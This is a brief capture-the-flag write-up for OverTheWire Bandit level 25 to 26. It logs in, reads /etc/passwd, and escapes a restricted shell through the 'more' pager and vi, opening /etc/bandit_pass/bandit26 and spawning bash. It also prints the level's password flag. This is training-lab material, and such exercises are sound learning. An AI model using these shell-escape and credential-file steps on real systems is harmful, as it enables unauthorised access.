### Bandit Write Up
### Level 25 --> 26
ssh bandit25@bandit.labs.overthewire.org -p 2220
cat /etc/passwd | grep bandit26 #Looking at where the user's shell is
cat /usr/bin/showtext #The more command is the vulnerability apparently
# If the terminal screen is too small, the more command goes into scrolling mode which allows us to use commands like "v"
:e /etc/bandit_pass/bandit26
# Flag is 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
:set shell=/bin/bash
:shell #Now I can access a bash shell
###Ngl, this is a very weird level and would have never gotten it unless I looked at the other two people who had solved it